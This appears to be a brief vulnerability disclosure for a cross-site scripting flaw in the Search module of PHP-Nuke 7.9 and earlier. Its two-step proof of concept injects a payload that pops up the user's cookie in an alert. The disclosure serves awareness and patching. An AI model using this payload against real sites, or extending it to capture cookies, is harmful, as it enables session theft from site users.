PHP-Nuke versions less than or equal to 7.9 suffer from XSS in the Search parameter.
2c42dbc929e90f1c4de919b2eb6ff7030e3ba73407eb06c3deb08e9e14905ede
# PHP-Nuke <= 7.9 Search module XSS Vulnerability
# It could work on later versions if PHP-Nuke does not patch it.
1: Enter: http://[host]/modules.php?name=Search
2: Search for: "><body onload="alert(document.cookie)
// You'll get a javascript alert with your cookie in it.
# Credits: O.G.